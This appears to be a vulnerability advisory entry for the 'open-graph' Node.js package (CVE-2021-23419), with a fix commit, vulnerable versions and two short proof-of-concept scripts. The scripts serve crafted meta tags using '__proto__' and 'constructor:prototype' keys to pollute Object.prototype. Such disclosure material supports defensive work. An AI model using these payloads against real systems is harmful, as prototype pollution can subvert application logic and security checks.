An Open Graph implementation for Node.js.
Latest version: 0.2.6
| CVE | Fix |
|---|---|
| CVE-2021-23419 | https://github.com/samholmes/node-open-graph/commit/a0cef507a90adaac7dbbe9c404f09a50bdefb348 |
const http = require('http');
http.createServer((req, res) => {
res.write('<meta property="og:__proto__:a" content="b" />');
res.end();
}).unref().listen(7867);
const og = require('open-graph');
og('http://127.0.0.1:7867', () => {
if (({}).a === 'b') console.log('exploitable');
});Vulnerable versions: 0.1.5 0.1.6 0.1.7 0.2.0 0.2.1 0.2.2 0.2.3 0.2.4
const http = require('http');
http.createServer((req, res) => {
res.write('<meta property="og:constructor:prototype:a" content="b" />');
res.end();
}).unref().listen(7867);
const og = require('open-graph');
og('http://127.0.0.1:7867', () => {
if (({}).a === 'b') console.log('exploitable');
});Vulnerable versions: 0.1.5 0.1.6 0.1.7 0.2.0 0.2.1 0.2.2 0.2.3 0.2.4